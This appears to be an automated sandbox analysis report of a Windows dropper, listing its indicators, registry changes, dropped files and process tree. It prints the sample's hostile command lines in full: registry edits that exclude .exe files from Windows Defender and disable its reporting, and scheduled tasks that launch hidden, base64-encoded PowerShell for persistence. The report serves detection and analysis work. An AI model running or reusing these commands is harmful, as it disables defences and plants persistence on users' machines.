Analysis
-
max time kernel
127s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23/12/2022, 19:00
Static task
static1
General
-
Target
2900f0282e19d330d9111ac07c308a847c7513e8924f4434cdbbe09bd10eb0e3.exe
-
Size
7.2MB
-
MD5
93ff44da5eb116aae5a0859f1210a82e
-
SHA1
f5c4161bcdcfdd4e7926863e8c70b6fced5a6805
-
SHA256
2900f0282e19d330d9111ac07c308a847c7513e8924f4434cdbbe09bd10eb0e3
-
SHA512
3d5f2e167f7a2667125f76e231d67cc231ffc965733c033ddd78a5a27d13067cdad9f9afd474e6356817593a4adca544249f8bf42b83f76b7de6eaa2abb73b00
-
SSDEEP
196608:91OjPhcO5oykYviFAdFdyJYk0Ou6HXVbTLAZZZT68:3OjJlofY/KJjzlFbTU55
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 58 3060 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 4288 Install.exe 816 Install.exe 4740 sVEhAcA.exe 3564 hFYvDGo.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation hFYvDGo.exe -
Loads dropped DLL 1 IoCs
pid Process 3060 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json hFYvDGo.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini hFYvDGo.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 hFYvDGo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol hFYvDGo.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini sVEhAcA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 hFYvDGo.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol sVEhAcA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_392D09B4041D6970192F5EF741FAA9F2 hFYvDGo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_392D09B4041D6970192F5EF741FAA9F2 hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D hFYvDGo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA hFYvDGo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA hFYvDGo.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\GCRfJHsLrQUU2\lfNAjDsQdJGcX.dll hFYvDGo.exe File created C:\Program Files (x86)\GCRfJHsLrQUU2\HasSRmJ.xml hFYvDGo.exe File created C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR\yKRcKKY.xml hFYvDGo.exe File created C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR\RdcrOgU.dll hFYvDGo.exe File created C:\Program Files (x86)\RsrRlNSOmQpSC\Uwcadtu.dll hFYvDGo.exe File created C:\Program Files (x86)\RsrRlNSOmQpSC\sKktvsU.xml hFYvDGo.exe File created C:\Program Files (x86)\pjFvAzrMU\fADQJc.dll hFYvDGo.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi hFYvDGo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi hFYvDGo.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak hFYvDGo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak hFYvDGo.exe File created C:\Program Files (x86)\pjFvAzrMU\cmISWGz.xml hFYvDGo.exe File created C:\Program Files (x86)\dvcQCBtrcHUn\anupnOG.dll hFYvDGo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja hFYvDGo.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\EYwoUjzpSpPCMYcxX.job schtasks.exe File created C:\Windows\Tasks\hJUayhHcLKanQXB.job schtasks.exe File created C:\Windows\Tasks\okLkyXunDVQVEvYWW.job schtasks.exe File created C:\Windows\Tasks\bAekpXbeORPoFqoXcn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3900 schtasks.exe 1800 schtasks.exe 2780 schtasks.exe 4324 schtasks.exe 3184 schtasks.exe 1060 schtasks.exe 1644 schtasks.exe 4184 schtasks.exe 1724 schtasks.exe 880 schtasks.exe 3372 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume hFYvDGo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" hFYvDGo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" hFYvDGo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5" hFYvDGo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2616110-0000-0000-0000-d01200000000}\NukeOnDelete = "0" hFYvDGo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" hFYvDGo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" hFYvDGo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix hFYvDGo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ hFYvDGo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" hFYvDGo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer hFYvDGo.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4700 powershell.EXE 4700 powershell.EXE 4932 powershell.exe 4932 powershell.exe 2364 powershell.exe 2364 powershell.exe 1128 powershell.EXE 1128 powershell.EXE 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe 3564 hFYvDGo.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4700 powershell.EXE Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 1128 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2548 wrote to memory of 4288 2548 2900f0282e19d330d9111ac07c308a847c7513e8924f4434cdbbe09bd10eb0e3.exe 81 PID 2548 wrote to memory of 4288 2548 2900f0282e19d330d9111ac07c308a847c7513e8924f4434cdbbe09bd10eb0e3.exe 81 PID 2548 wrote to memory of 4288 2548 2900f0282e19d330d9111ac07c308a847c7513e8924f4434cdbbe09bd10eb0e3.exe 81 PID 4288 wrote to memory of 816 4288 Install.exe 82 PID 4288 wrote to memory of 816 4288 Install.exe 82 PID 4288 wrote to memory of 816 4288 Install.exe 82 PID 816 wrote to memory of 1260 816 Install.exe 85 PID 816 wrote to memory of 1260 816 Install.exe 85 PID 816 wrote to memory of 1260 816 Install.exe 85 PID 816 wrote to memory of 1616 816 Install.exe 87 PID 816 wrote to memory of 1616 816 Install.exe 87 PID 816 wrote to memory of 1616 816 Install.exe 87 PID 1260 wrote to memory of 4524 1260 forfiles.exe 89 PID 1260 wrote to memory of 4524 1260 forfiles.exe 89 PID 1260 wrote to memory of 4524 1260 forfiles.exe 89 PID 1616 wrote to memory of 4928 1616 forfiles.exe 90 PID 1616 wrote to memory of 4928 1616 forfiles.exe 90 PID 1616 wrote to memory of 4928 1616 forfiles.exe 90 PID 4524 wrote to memory of 456 4524 cmd.exe 91 PID 4524 wrote to memory of 456 4524 cmd.exe 91 PID 4524 wrote to memory of 456 4524 cmd.exe 91 PID 4928 wrote to memory of 4228 4928 cmd.exe 92 PID 4928 wrote to memory of 4228 4928 cmd.exe 92 PID 4928 wrote to memory of 4228 4928 cmd.exe 92 PID 4524 wrote to memory of 2316 4524 cmd.exe 93 PID 4524 wrote to memory of 2316 4524 cmd.exe 93 PID 4524 wrote to memory of 2316 4524 cmd.exe 93 PID 4928 wrote to memory of 3968 4928 cmd.exe 94 PID 4928 wrote to memory of 3968 4928 cmd.exe 94 PID 4928 wrote to memory of 3968 4928 cmd.exe 94 PID 816 wrote to memory of 880 816 Install.exe 97 PID 816 wrote to memory of 880 816 Install.exe 97 PID 816 wrote to memory of 880 816 Install.exe 97 PID 816 wrote to memory of 5064 816 Install.exe 99 PID 816 wrote to memory of 5064 816 Install.exe 99 PID 816 wrote to memory of 5064 816 Install.exe 99 PID 4700 wrote to memory of 1556 4700 powershell.EXE 103 PID 4700 wrote to memory of 1556 4700 powershell.EXE 103 PID 816 wrote to memory of 3576 816 Install.exe 110 PID 816 wrote to memory of 3576 816 Install.exe 110 PID 816 wrote to memory of 3576 816 Install.exe 110 PID 816 wrote to memory of 2780 816 Install.exe 112 PID 816 wrote to memory of 2780 816 Install.exe 112 PID 816 wrote to memory of 2780 816 Install.exe 112 PID 4740 wrote to memory of 4932 4740 sVEhAcA.exe 116 PID 4740 wrote to memory of 4932 4740 sVEhAcA.exe 116 PID 4740 wrote to memory of 4932 4740 sVEhAcA.exe 116 PID 4932 wrote to memory of 3532 4932 powershell.exe 118 PID 4932 wrote to memory of 3532 4932 powershell.exe 118 PID 4932 wrote to memory of 3532 4932 powershell.exe 118 PID 3532 wrote to memory of 2172 3532 cmd.exe 119 PID 3532 wrote to memory of 2172 3532 cmd.exe 119 PID 3532 wrote to memory of 2172 3532 cmd.exe 119 PID 4932 wrote to memory of 4232 4932 powershell.exe 120 PID 4932 wrote to memory of 4232 4932 powershell.exe 120 PID 4932 wrote to memory of 4232 4932 powershell.exe 120 PID 4932 wrote to memory of 4872 4932 powershell.exe 121 PID 4932 wrote to memory of 4872 4932 powershell.exe 121 PID 4932 wrote to memory of 4872 4932 powershell.exe 121 PID 4932 wrote to memory of 4572 4932 powershell.exe 122 PID 4932 wrote to memory of 4572 4932 powershell.exe 122 PID 4932 wrote to memory of 4572 4932 powershell.exe 122 PID 4932 wrote to memory of 752 4932 powershell.exe 123 PID 4932 wrote to memory of 752 4932 powershell.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\2900f0282e19d330d9111ac07c308a847c7513e8924f4434cdbbe09bd10eb0e3.exe"C:\Users\Admin\AppData\Local\Temp\2900f0282e19d330d9111ac07c308a847c7513e8924f4434cdbbe09bd10eb0e3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Users\Admin\AppData\Local\Temp\7zS59CD.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Users\Admin\AppData\Local\Temp\7zS5F8A.tmp\Install.exe.\Install.exe /S /site_id "385104"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4524 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:456
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2316
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4228
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:3968
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNxEvzmWk" /SC once /ST 09:18:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNxEvzmWk"4⤵PID:5064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNxEvzmWk"4⤵PID:3576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bAekpXbeORPoFqoXcn" /SC once /ST 20:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg\yOuMhmyBioTMOCC\sVEhAcA.exe\" KF /site_id 385104 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2780
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1556
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1492
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1784
-
C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg\yOuMhmyBioTMOCC\sVEhAcA.exeC:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg\yOuMhmyBioTMOCC\sVEhAcA.exe KF /site_id 385104 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4740 -
